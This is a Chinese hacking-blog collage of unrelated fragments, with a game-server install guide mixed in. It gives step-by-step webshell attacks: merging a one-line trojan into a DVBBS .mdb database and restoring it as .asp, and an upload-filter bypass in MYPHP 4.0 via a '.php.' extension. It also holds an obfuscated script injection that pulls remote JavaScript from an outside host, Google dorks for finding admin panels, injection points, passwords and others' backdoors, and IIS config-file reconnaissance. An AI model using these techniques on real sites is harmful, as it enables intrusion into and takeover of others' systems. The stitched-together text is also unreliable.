抬者棺材的小屋

新建一个数据库文件，命名为a.mdb
新建一个文本文件，命名为b.txt，并写入一句话木马
在命令行下输入命令copy a.mdb/b+b.txt/b c.mdb
得到的c.mdb就是已插入一句话木马的数据库
然后在发帖子的地方上传附件，将这个数据库后缀改为RAR
预览帖子，点击附件下载，便可以得到上传地址
进入后台，恢复数据库，输入已上传文件的相对路径，在目标文件中一定要写.asp格式
提示恢复成功，成功拿到webshell

8.0：
2003系统：
①采用修改论坛基本设置中的上传目录设定 设置成xxx.asp/ 上传经过数据库合并的ASP木马..改后缀名上传....即可得到Shell
②数据库备份的目录改为/xx.asp/1.mdb

因为DVBBS 8.0..只能备份成mdb的格式....

End if
backpath=server.mappath(backpath)
If Lcase(Mid(backpath,instrRev(backpath,'.')+1))<>'mdb' Then
response.write '保存数据库名不合法'
Response.End
End If

这里 我们可以把路径改为xxx.asp 比如 xxxx.asp/1.mdb

1.mdb里插入了一句话木马 这样是可以得到shell的上传后缀中加php等.上传

一、准备软件DBCommander 2000 Pro和传奇服务端（我搜集了3个版本的服务端：我本沉默、荆门风云、无忧传奇，最后经过全面测试选择使用无忧传奇的版本）。二、简易安装说明： 1、安装设置DBCommander 2000 Pro 1)安装DBCommander 2000 Pro 2) 打开控制面板 3) 打开BDE Administrator. 点击 ‘Object‘, ‘New‘. 4) 选择STANDARD点击OK. 5)在左面的面版你可以看到standard1,改名为HeroDB 在右边的面版如下 Type STANDARD DEFAULT DRIVER PARADOX ENABLE BCD FALSE PATH 修改为 Type STANDARD DEFAULT DRIVER PARADOX ENABLE BCD FALSE PATH D:\mirserver\mud2\DB （更改这里的默认D，你安装在哪个盘里就是哪个盘） 6)在左边的面版右键点击HeroDB选择‘apply‘. 7)关闭 BDE Administrator. 然后解压缩服务端文件到D盘（方便后续设置） 2、修改服务端文件的ip地址：总共改的IP有21处 D:\mirserver\gate_server\LoginGate\Mirgate.ini 里的IP192.168.0.1改为你的IP D:\mirserver\gate_server\RunGate\Mirgate.ini 里的IP192.168.0.1改为你的IP D:\mirserver\gate_server\SelChrGate\Mirgate.ini 里的IP192.168.0.1改为你的IP D:\mirserver\Mir200\!Runaddr.txt 里的IP192.168.0.1

MYPHP 4.0 企业建站系统 0day
漏洞官方地址:www.myphp.cn(中文最专业的企业建站系统)
作者:char
出处:www.yhsafe.com 银河安全网
漏洞成因:未能很好的过滤上传文件扩展而引起的上传漏洞
漏洞利用地址:http://localhost/adminc/down_upload.php
漏洞代码分析:

$down_type='.doc|.zip|.rar|.gif|.jpg|.jpeg|.png|.xls|.pdf|.ppt|.exe';
if (!strstr($down_type, $imgtype_type)) {
   echo '<span class=txt>请上传'.$down_type.'类型文件</span>';
   exit;
}
判断上传格式的地方,只允许这些类型.如果这里我们能欺骗,就可以达到上传任意文件的目的了.
用户可以在上传处提交一张PHP木马,然后再在.php后面加个小数点(.php.),成功上传.

漏洞利用方式:
打开http://localhost/adminc/down_upload.php  (后台上传页面没做用户验证,直接访问)
先导入一张php木马,不要上传,直接传肯定

<script>z='document.'</script>
<script>z=z+'write(''</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.sb8'</script>
<script>z=z+'.org/a.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>')'</script>
<script>eval_r(z)</script>

link: 可以得到一个所有包含了某个指定URL的页面列表. 例如link:www.google.com 就可以得到所有连接到Google的页面.不用担心
=====================================
=============
intext:管理
filetype:mdb
inurl:file
site:xx.com filetype:txt 查找TXT文件 其他的依次内推
site:xx.com intext:管理
s
te:xx.com inurl:login
site:xx.com intitle:后台
查看服务器使用的程序
site:xx.com filetype:asp
site:xx.com filetype:php
site:xx
com filetype:jsp
查看上传漏洞：
site:xx.com inurl:file
site:xx.com inurl:load
查找注射点：
site:xx.com filetype:asp
site:tw
nurl:asp?id= 这个是找台湾的
或
site:jp inurl:asp?id= 这个是找日本的
或
site:ko inurl:asp?id= 这个是找韩国的
依次类推


intitle:

google hacking其实并算不上什么新东西，当时并没有重视这种技术，认为webshell什么的，并无太大实际用途。google hacking其实并非如此简单...
　　常用的google关键字:

　　foo1 foo2 (也就是关联，比如搜索xx公司 xx美女)

　　operator:foo

　　filetype:123 类型

　　site:foo.com 相对直接看网站更有意思，可以得到许多意外的信息

　　intext:foo

　　intitle: fooltitle 标题哦

　　allinurl:foo 搜索xx网站的所有相关连接。(踩点必备)

　　links:foo 不要说就知道是它的相关链接

　　allintilte:foo.com

　　我们可以辅助'-' '+'来调整搜索的精确程度

　　直接搜索密码:(引号表示为精确搜索)

　　当然我们可以再延伸到上面的结果里进行二次搜索

　　'index of' htpasswd / passwd

　　filetype:xls username

默认IIS站点配置文件有2个MBSchema.xm和MetaBase.xml,
路径是C:\WINDOWS\system32\inetsrv\(一般这个目录设置的everyone读的权限.)
MetaBase.xml这个文件是存的站点IIS配置的信息.里面可以查到所有本服务器IIS下设置的站点目录和配置。
几个主要的配置有:
ServerComment:我的网站 //站点的名称
ServerBindings:80 //站点的端口
Path='D:\wwwroot' //这里是站点的路径
DefaultDoc='index.asp,index.php,index.htm,Default.htm,Default.asp,Default.aspx' //默认文档头,就是主页显示文件名
ScriptMaps=='.asa,C:\WINDOWS\syst...........' //站点支持的哪些脚本.

还有就是看C:\WINDOWS\system32\inetsrv\History这个目录,这个目录里是对每次站点的IIS设置进行的备份.
但这些都涉及到权限问题，如果权限默认设置严格就访问不了了。

原创文章版权所有，转载请以链接形式注明来源 冰Sugar's BLOG - http://www.qq3389.cn/blog/

Google Hack技术是现在最火暴的黑客技术之一.这项技术是撒网式攻击技术中是最好的方法.

   1.利用Google Hack技术进行信息的收集,查找网站后台以及网站的拓扑结果

   2.搜索别人留下来的后门(最直接,最省力的获取Webshell的方式)

   踩点在入侵中起着决定性的作用,它占据了整个入侵过程中90%以上的时间.

   收集信息一般主要有以下十个方面:(网站例)

A.网站注册信息
B.网管资料
C.共享资料
D.端口信息
E.FTP资源
F.网站拓扑结构
G.网站URL地址结构
H.网站系统版本
I.后台地址
J.弱口令

Google常用语法

intext:关键字
网页内容搜索

intitle:关键字
网站标题搜索

filetype:关键字
搜索指定文件        EG:'信息安全论文'   filetype:doc >>>> doc结尾的 '信息安全论文'地址

info:关键字
搜索指定站的基本信息

inurl:关键字
搜索含有关键字的URL

site:域名
返回域名中所有URL地址

related:URL